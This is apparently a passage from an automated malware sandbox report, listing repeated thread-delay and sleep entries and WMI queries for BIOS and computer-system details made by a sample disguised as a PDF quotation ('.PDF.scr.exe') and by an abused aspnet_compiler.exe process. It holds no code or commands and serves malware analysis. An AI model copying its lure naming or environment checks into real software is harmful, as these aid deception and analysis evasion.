Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595077	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594749	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594640	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Window / User API: threadDelayed 7384	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Window / User API: threadDelayed 2457	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Window / User API: threadDelayed 1305	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Window / User API: threadDelayed 8546	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 3452	Thread sleep count: 7384 > 30	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 3452	Thread sleep count: 2457 > 30	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -99859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -99735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -99625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -99516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -99406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -99297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -99176s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -98946s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -98746s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -98641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -98486s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -98345s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -98211s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -98080s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -97969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -97860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -97750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -97641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -97516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -97391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -97281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -97172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -97053s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -96938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -96828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -96710s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -96609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -96500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -96391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -96281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -96172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -96061s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -95953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -95844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -95717s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -95608s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -95496s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -95387s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -95279s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -95172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -95063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -94938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -94813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -94688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -94578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -94469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -94344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe TID: 4900	Thread sleep time: -94235s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 2080	Thread sleep count: 1305 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 2080	Thread sleep count: 8546 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -599671s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -599233s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -598797s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -598578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -598468s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -598250s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -598140s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -598031s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -597922s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -597812s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -597593s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -597481s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -597375s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -597265s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -597155s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -597047s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -596937s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -596828s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -596718s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -596609s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -596500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -596390s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -596281s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -596172s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -596062s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -595953s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -595844s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -595734s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -595625s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -595515s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -595406s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -595297s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -595187s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -595077s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -594968s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -594859s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -594749s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5948	Thread sleep time: -594640s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 99859	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 99735	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 99625	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 99516	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 99406	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 99297	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 99176	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 98946	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 98746	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 98641	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 98486	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 98345	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 98211	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 98080	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97969	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97860	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97750	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97641	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97516	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97391	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97281	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97172	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97053	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 96938	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 96828	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 96710	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 96609	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 96500	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 96391	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 96281	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 96172	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 96061	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 95953	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 95844	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 95717	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 95608	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 95496	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 95387	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 95279	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 95172	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 95063	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 94938	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 94813	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 94688	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 94578	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 94469	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 94344	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 94235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599233	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597481	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597155	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597047	Jump to behavior
